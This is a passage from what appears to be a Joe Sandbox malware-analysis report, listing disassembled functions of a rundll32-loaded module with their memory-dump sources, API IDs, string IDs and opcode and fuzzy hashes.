                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                  • Opcode ID: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                                                  • Instruction ID: e86eebddfadbf209218566a74c72582cf7fff1bf59de2877caf13f980550ab1d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B113030204E0D09FADB632144A67FD12416F4D3FEF1ACB28B8350A2C2ED389B096799
                                                                                                                                                                                                                                                  Function 0000000180041480 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                  • Opcode ID: 43b698f3bd72d782d1a4c4367ab40e0fd6e179516ccf90768e29b969fcb783f7
                                                                                                                                                                                                                                                  • Instruction ID: 586806abb7160c1286a1b2c9858a8c81ad64b0ece563cba21c458cc6968070c5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43b698f3bd72d782d1a4c4367ab40e0fd6e179516ccf90768e29b969fcb783f7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21110C30604E0949FADB637144A67FD11417F8D3FEF1ACB24B836062D2EE289B096789
                                                                                                                                                                                                                                                  Function 000000018000D56C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                  • Opcode ID: 09b6cd871ff89506528b68077a13dcbbaff50fd9b0353c15b1e87b0f63462aad
                                                                                                                                                                                                                                                  • Instruction ID: 603ec2f23fa6d6c6a25bd3aeda4f846d3f0b7b81b5b2ff33ca2fe6bf8accc470
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09b6cd871ff89506528b68077a13dcbbaff50fd9b0353c15b1e87b0f63462aad
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63917F73614B888AE792DB65E8903DD7BA0F3497C8F14811AFB8957755DF38C299CB00
                                                                                                                                                                                                                                                  Function 000000018000D2FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                  • Opcode ID: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                                                  • Instruction ID: dfb6a33e339ab0c6007a7a63b5c9da813757f51a8917a400a443b559987f5a56
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43615032508BC886E7A2DF15E4407DAB7A0F7897D8F048216FB9857B95DF78D298CB10
                                                                                                                                                                                                                                                  Function 000000018000DAEC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                  • Opcode ID: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
                                                                                                                                                                                                                                                  • Instruction ID: 8344979c66b9cceb0b7acf630f590e38be3bd2ff735d44e9d3a026d285abadf4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7518A3210468C8AEBA6CF2594447A977A0F358BC4F14C127FB8947BD5CF78D668CB11
                                                                                                                                                                                                                                                  Function 00000001800117A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                                                  • String ID: %lf
                                                                                                                                                                                                                                                  • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                                                  • Opcode ID: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                                                  • Instruction ID: 1d1499fd28cd0defdd0e894b6a29d0ba661b97baa627992bc5e4fd3905ed2300
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C01A221614B9840FB929B25B8013DBA361BF9A7C4F54C322BE5967B65DE2CC2578700
                                                                                                                                                                                                                                                  Function 0000000180011834 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                                                  • String ID: %lf
                                                                                                                                                                                                                                                  • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                                                  • Opcode ID: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                                                  • Instruction ID: e8046b89d42cedcdfa3f71cef9b3097e4d32cbc59f7538c484cb4a0ec4f8bfae
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF08631614BD890FB569B25B8013DBA361BF997C4F54C321BE5957B65CE3CC2578700
                                                                                                                                                                                                                                                  Function 0000016AD27526B0 Relevance: 6.4, APIs: 5, Instructions: 132COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                  • Opcode ID: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                                                  • Instruction ID: a017d9872aef7cbf6338ae20bae681795d5a1a42f4c36d5b64ccad3ae7c64342
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D512C32618B8596DB64CB49E88036EB7A0FBC8B94F504425EB8E97BA4DB3DD444CF05
                                                                                                                                                                                                                                                  Function 0000000180056664 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056787
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056811
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                                                                  • Opcode ID: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                                                  • Instruction ID: 1260cb0f68ca8a8ce6bcd19fd34b1b076e826746dc0d6dce6279d08af0310b67
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E991E472F14A5885FBA2CB6594407ED2BA4F34CBD8F448205FE4A776A5CF36C68AC710
                                                                                                                                                                                                                                                  Function 0000000180014FCC Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2943138195-0
                                                                                                                                                                                                                                                  • Opcode ID: 833d5f12b3745b43fcb298177fc6e3fb40fcfb7b31867bf43b28185f1c8aef01
                                                                                                                                                                                                                                                  • Instruction ID: be38e034833b563642ed2c4684e659858a25fcc5f3f681f84aaac44cdb52407b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 833d5f12b3745b43fcb298177fc6e3fb40fcfb7b31867bf43b28185f1c8aef01
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D915D77A00B98C9FB938BA4D8403DC37B1B30D789F65C015EE892B695DF798A49C741
                                                                                                                                                                                                                                                  Function 0000000273F41010 Relevance: 6.1, APIs: 4, Instructions: 107sleepCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3794425031.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794369878.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794425031.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Sleep_amsg_exit
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1015461914-0
                                                                                                                                                                                                                                                  • Opcode ID: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                                                  • Instruction ID: b36ed253b1f92ff08f278adfa0ead6049e2a2874eebc081211355efa6209b103
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08417C31E0CA4885F765DB1AEC497AA2395B784BE4F744025DE0C87FA1EE28CA40B343
                                                                                                                                                                                                                                                  Function 0000000180017CB4 Relevance: 6.1, APIs: 4, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3863519203-0
                                                                                                                                                                                                                                                  • Opcode ID: ab40c895ed32f951a42b94f9895b2f8f6206b0eb416bcb5b27eecb077ca5f57b
                                                                                                                                                                                                                                                  • Instruction ID: 4055e878f64a0d4d9d529e2badb35a1d8728a1b9fc24d6f266f1b5ddb2a3fbf8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab40c895ed32f951a42b94f9895b2f8f6206b0eb416bcb5b27eecb077ca5f57b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A412576A00B8899EB42CFA4E8403EC37B0F748B98F64C415EE495B79ADF78C649C750
                                                                                                                                                                                                                                                  Function 000000018000DD24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                  • API String ID: 1467352782-3733052814
                                                                                                                                                                                                                                                  • Opcode ID: 1f78ce30d5d3abf011c49c12d0b77ceb6a2fa33deb273aa3e414b84e124295c9
                                                                                                                                                                                                                                                  • Instruction ID: 9c4d39e4c652f3945ef35df7601ed0ac793b78f7d53c8ab04d9db08b0d63a189
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f78ce30d5d3abf011c49c12d0b77ceb6a2fa33deb273aa3e414b84e124295c9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B27191721046888ADBA2DF25D4507ADBBA0F348BC9F14C126FB8947B89CF38C699C751
                                                                                                                                                                                                                                                  Function 000000018000A630 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
